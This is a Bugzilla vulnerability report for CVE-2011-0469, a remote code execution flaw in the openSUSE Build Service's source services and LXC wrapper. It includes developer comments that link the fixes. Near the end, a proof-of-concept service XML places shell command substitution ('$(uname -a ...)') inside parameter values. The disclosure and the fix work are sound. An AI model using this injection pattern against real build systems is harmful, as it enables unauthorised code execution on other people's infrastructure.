|
Bugzilla – Full Text Bug Listing |
| Summary: | VUL-0: CVE-2011-0469: openSUSE Build Service: remote code execution | ||
|---|---|---|---|
| Product: | [openSUSE] openSUSE.org | Reporter: | Matthias Weckbecker <mweckbecker> |
| Component: | BuildService | Assignee: | Adrian Schröter <adrian.schroeter> |
| Status: | RESOLVED FIXED | QA Contact: | Adrian Schröter <adrian.schroeter> |
| Severity: | Major | ||
| Priority: | P2 - High | CC: | meissner, security-team |
| Version: | unspecified | ||
| Target Milestone: | --- | ||
| Hardware: | Other | ||
| OS: | Other | ||
| Whiteboard: | |||
| Found By: | --- | Services Priority: | |
| Business Priority: | Blocker: | --- | |
| Marketing QA Status: | --- | IT Deployment: | --- |
use CVE-2011-0469 The first script, I found this issue in, is fixed now (sr 64070). But the other services, especially with network connection, contain a higher risk. This was only possible when using the "experimental lxc wrapper for additional security ;)". This is fixed now. I will include the fix in next 2.1 release, but I have some serious doubts that anyone else ever used the LXC wrapper (because it is quite tricky to get it working anyway). Comment 2: The problem was not the particular service, it was buggy, but safe. The problem was the lxc wrapper script (only used on server side so far). main fix is in: https://github.com/openSUSE/open-build-service/commit/76b0ab003f34435ca90d943e02dd22279cdeec2a secondary fix in: https://github.com/openSUSE/open-build-service/commit/23c8d21c75242999e29379e6ca8418a14c8725c6 no official announcemnet on openbuildservice.org. |
Adrian, as discussed last week the service-code contains various remote code execution vulnerabilities which allow attackers to execute arbitrary code on build systems with nobody-privileges. Ludwig suggested to open a bug for the issue in order to keep it tracked. POC: Add the following service to your project to get access to a machine w/ internet connectivity: <services> <service name="download_url"> <param name="protocol">ftp</param> <param name="host">cpan.myclash.net</param> <param name="path">$(uname -a; exit 0)</param> </service> <service name="verify_file"> <param name="file">$(uname -a)</param> <param name="verifier">md5</param> <param name="checksum">645ea983242177e446d68905cb5ecda5</param> </service> </services>